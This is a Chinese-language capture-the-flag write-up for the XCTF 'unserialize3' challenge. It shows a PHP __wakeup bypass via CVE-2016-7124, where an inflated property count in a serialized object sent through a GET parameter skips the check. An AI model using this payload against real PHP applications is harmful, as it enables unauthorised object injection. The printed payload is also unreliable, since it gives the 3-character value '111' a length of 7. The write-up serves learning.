详情:
地址:https://adworld.xctf.org.cn/challenges/list (unserialize3) 看到题目名称是反序列化
代码审计
<?php
class xctf{// 定义一个公有属性$flag,通常CTF题目中需要获取该属性值public $flag = '111'; // 此处为示例值,实际可能为真实flag/*** 魔术方法 __wakeup() 在对象反序列化时自动调用* 这里通过exit终止脚本执行,防止反序列化攻击*/public function __wakeup(){exit('bad requests'); // 当对象被反序列化时立即退出并显示错误信息
}
}
// ----------------------------------------------------
// 请求示例URL格式:...?code=序列化的对象字符串
// 攻击目标:需要通过修改序列化数据绕过__wakeup方法
?>
- 通过代码审计得到一个信息,当共有属性 flag 中的值被反序列化的时候会调用 wakeup 这个魔术方法.然后这个方法会直接退出并且返回一个 bad requests,所以这里很简单需要绕过 wakeup 这个模式方法即可了!
- 这个是 CVE-2016-7124 漏洞的情况.当序列化的字符串中的对象的属性个数超过实际的个数时候,__wakeup 就会被跳过,因此可以修改属性值来绕过,从而得到 flag
- 而且这个代码有一个 get 参数 CODE 可以传递序列化字符串.
- 这里思路很明确,我们先利用共有属性来序列化一个字符串,然后修改他的属性的数量,然后再将其反序列化绕过 __wakeup 即可得到 flag
构造 payload
payload 介绍
<?php
class xctf{public $flag='111';
}
$obj= new xctf();
echo serialize($obj);
?>
这里使用xctf的类中的flag的属性,然后将其给到变量obj,然后将其序列化
O:4:"xctf":1:{s:4:"flag";s:7:"111";} 得到原始数据
介绍O:4:"xctf":1:{s:4:"flag";s:7:"111";}这是php序列化(serialize)后的对象的格式,表示一个类的实例
O :对象标识符,表示这是一个对象(object)
4 :类名长度,表示类名字符串长度为4字节
xctf :类名,表示被序列化的类名为xctf
1 :属性数量,该对象包含1个成员变量(属性),也就是flag这个共有的属性,外部和内部都能访问
{} :属性列表,是所有属性的序列化值s:类型标识符,表示这是一个字符串(string)4:长度,表示属性名字符串的长度为4字节"flag":属性名,成员变量名称为flag
这3部分为属性名称,后面的3部分是属性的值s:类型标识符,表示这是一个字符串(string)7:长度,表示属性值的字符串的长度为7(但是实际可能是3)"111":属性值,成员变量值为111
只需要修改属性的数量即可,由 payload 知道只有一个共有属性 flag,所以这里属性是 1
详细介绍
这里的属性值是 1
O:4:"xctf":1:{s:4:"flag";s:7:"111";}
由于这里的属性的值是1,所以这串代码直接去反序列化会触发魔术方法,从而导致退出程序,所以我们需要修改属性值,绕过魔法方法
- O:4:"xctf":3:{s:4:"flag";s:7:"111";}
- 修改成这样即可,然后利用 code 参数 get 传入即可
-
-
总结:
- 主要是要熟练掌握序列化和放序列化的知识点
- 需要了解序列化的每一个参数的意义,然后才可能利用这个漏洞,所以说有一定的难度
- 分享给各位师傅们,希望有帮助!